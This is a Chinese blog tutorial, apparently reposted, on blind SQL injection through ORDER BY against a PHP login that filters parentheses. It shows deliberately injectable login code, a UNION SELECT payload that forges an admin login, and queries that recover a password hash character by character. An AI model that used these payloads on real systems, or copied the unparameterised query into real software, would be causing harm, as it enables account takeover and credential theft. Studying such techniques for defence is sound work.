2. 程式人生 > >利用order by 進行盲註

利用order by 進行盲註

阿新 發佈:2017-10-21
sql ive index.php md5 strong password 作者 err 0.00

0x01 利用場景

登錄代碼:

$username = $_POST[‘username‘];
$password = $_POST[‘password‘];
if(filter($username)){
    //過濾括號
}else{
    $sql="SELECT * FROM admin WHERE username=‘".$username."‘";
    $result=mysql_query($sql);
    @$row = mysql_fetch_array($result);
    if(isset($row) && $row[‘username‘] === ‘admin‘){
        if ($row[‘password‘]===md5($password)){
            //Login successful
        }else{
            die("password error!");
        }
    }else{
        die("username does not exist!");
    }
}

有下列表:

mysql> select * from admin where username=‘admin‘;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)

這樣一個一般的場景,用戶登錄時,用戶名錯誤提示:用戶名錯誤,用戶名正確密碼錯誤提示:密碼錯誤

0x02 UNION SELECT登錄

看到這個邏輯第一想法肯定是直接利用union select偽造密碼登錄:

username=‘ union select 1,‘admin‘,‘c4ca4238a0b923820dcc509a6f75849b&password=1

mysql> select * from admin where username=‘‘ union select 1,‘admin‘,‘c4ca4238a0b923820dcc509a6f75849b‘;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | c4ca4238a0b923820dcc509a6f75849b |
+----+----------+----------------------------------+
1 row in set (0.00 sec)

但是想得到password怎麽辦

0x03 利用order by起飛

由登錄提示可獲取一個bool條件,如何用order by利用這個bool條件

mysql> select * from admin where username=‘‘ or 1 union select 1,2,‘5‘ order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 5                                |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username=‘‘ or 1 union select 1,2,‘6‘ order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 6                                |
+----+----------+----------------------------------+
2 rows in set (0.01 sec)

mysql> select * from admin where username=‘‘ or 1 union select 1,2,‘51‘ order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 51                               |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username=‘‘ or 1 union select 1,2,‘52‘ order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 52                               |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

通過逐位判斷便可得到password

顯然此方法在實際中使用的不多,但在一些特定的環境中也許會用到,比如實驗環境,如果過濾了括號,其他盲註基本上就是廢了,便可利用order by進行註入。

著作權歸作者所有。
商業轉載請聯系作者獲得授權,非商業轉載請註明出處。
作者:p0
鏈接:http://p0sec.net/index.php/archives/106/
來源:http://p0sec.net/

利用order by 進行盲註

相關推薦

利用order by 進行

sql ive index.php md5 strong password 作者 err 0.00 0x01 利用場景 登錄代碼: $username = $_POST[‘username‘]; $password = $_POST[‘password‘]; i

GROUP BYORDER BY一起使用時,要意的問題!

聚合 pan csdn under line order 註意 net asp 轉:http://blog.csdn.net/haiross/article/details/38897835 註意:ORDER BY 子句中的列必須包含在聚合函數或 GROUP BY 子句中。

Mysql Order By 入總結

lmap regexp 通過 img tab 引用 情況 man ide 前言 最近在做一些漏洞盒子後臺項目的總結,在盒子多期眾測項目中,發現註入類的漏洞占比較大。其中Order By註入型的漏洞也占挺大一部分比例,這類漏洞也是白帽子樂意提交的類型(獎金高、被過濾概率小)

利用野草weedcmsuseragent漏洞拿shell

出了 shel fig 我只 直接插入 art 邏輯 app tools 野草網站管理系統(WEEDCMS)是由野草獨立基於PHP+MYSQL開發的內容管理系統。面向企業、個人、小門戶等中小規模網站使用而開發的。采用國際上比較流行Smarty引擎和敏捷的JQuery JS框

order by name

ber if語句 lec from word schema 報錯 order by sele order by name id id是一個註入點 可以利用if語句進行註入 order by name ,if(1=1,1,select 1 from information_

MySQL如何利用索引優化ORDER BY排序語句

login 查詢 art mysq 實例 .html 情況 降序排序 建立索引 官網排序優化:http://dev.mysql.com/doc/refman/5.5/en/order-by-optimization.html MySql創建索引時支持ASC或DESC排序。

玩得一手好入之order by排序篇

布爾 idt center 取反 操作符 aaa 發生 9.png 很多 看了之前Gr36_前輩在先知上的議題,其中有提到排序註入,這個在最近經常遇到這樣的問題,所以先總結下order by 排序註入的知識。 0×0

【sqli-labs】 less46 GET -Error based -Numeric -Order By Clause(GET型基於錯誤的數字型Order By從句入)

security 使用 tab eric and name users date for http://192.168.136.128/sqli-labs-master/Less-46/?sort=1 sort=4時出現報錯 說明參數是添加在order by 之後

mysql5.7基礎 select...order by...asc 按照一個字段進行升序排序

裏的 itcast 5.7 select 進行 代碼 from cast 老師 禮悟:   公恒學思合行悟,尊師重道存感恩。葉見尋根三返一,江河湖海同一體。 虛懷若谷良心主,願行無悔給最苦。讀書鍛煉養身心,誠勸且行且珍惜。   數據、數據,命

sqli-labs(十六)(order by入)

之前 order by www. 分享 extra 執行 value 四十七 sleep 第四十六關: http://www.bubuko.com/infodetail-2481914.html 這有篇文章講得還不錯可以看下 這關是order by後面的一個註入,用報錯註入

MySQL利用索引優化ORDER BY排序語句

MySQL利用索引優化ORDER BY排序語句 MySQL索引通常是被用於提高WHERE條件的資料行匹配或者執行聯結操作時匹配其它表的資料行的搜尋速度。 MySQL也能利用索引來快速地執行ORDER BY和GROUP BY語句的排序和分組操作。 通過索引優化來實

Linux下mysql進行group byorder by查詢報錯

select userId,count(movieId) from ratings group by userId order by userId 報錯:[Err] 1055 - Expression #1 of ORDER BY clause is not in GROUP BY clause

mysql8基礎 select...order by...desc 按照一個欄位進行降序排列

資料,資料,命根就在資料 ! 操作資料庫時,一定要謹慎小心。師萬物 這裡的程式碼看看就好,要有自己的判斷。遇到抉擇,要不恥上下問。 example stu@Ubuntu:~$ mysql -u root -p Enter password: Welc

【SQL】兩個帶order by查詢進行union all報ORA-00933錯誤的解決方法

在oracle SQL中,要求order by是select語句的最後一個語句,而且一個select語句中只允許出現一個order by語句,而且order by必須位於整個select語句的最後。 當時是要將一個十分複雜的檢索明細查詢和一個十分複雜的檢索彙總查詢的結果

使用ORDER BY子句進行排序

語法結構: [ORDER BY{order_by_expression} [ASC,DESC]}  [,...n]] 引數說明: order_by_expression 指定排序的列.可以指定為列名,列的別名和表示式. 注: 1).ORDER BY子句可包括未出現在此選擇列表

LINQ排序,用order by 子句進行排序

        在LINQ中,orderby子句可以同時指定多個排序元素,還可以為每個排序元素指定獨立的排序方式。orderby語句後的第一個的排序元素為主要排序,第二個位次要排序,依次類推,如下所示,將所有學生首先按照姓名的字元數從少到多排序,其次按照學生年齡從高到低排序

關於order by注入利用rand(true)的一個疑問

order by的一個利用方式是使用 rand(true) rand(false) 返回排序不同進行盲注, rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1

資料庫之SQL ORDER BY 語句用於對結果集進行排序

ORDER BY 語句用於對結果集進行排序。 ORDER BY 語句 ORDER BY 語句用於根據指定的列對結果集進行排序。 ORDER BY 語句預設按照升序對記錄進行排序。 如果您希望按照降序對記錄進行排序,可以使用 DESC 關鍵字。 原始的

MySQL如何利用索引優化ORDER BY排序語句

MySQL也能利用索引來快速地執行ORDER BY和GROUP BY語句的排序和分組操作。 通過索引優化來實現MySQL的ORDER BY語句優化: 1、ORDER BY的索引優化。如果一個SQL語句形如: SELECT [column1],[column2],…. FROM [TABLE] ORDER BY

【Mysql】利用group by附帶having進行聚類查詢

聚類查詢所針對的物件是表的其中一列,譬如如下的testtable表,要查出username這一列中,各個項所出現的次數,則用到聚類查詢 顯然,聚類查詢之後,得到的結果必須與id,number這兩列半點關係都沒有。因此,也就是正如上門,所說,聚類查詢所針對的物件是表的其中一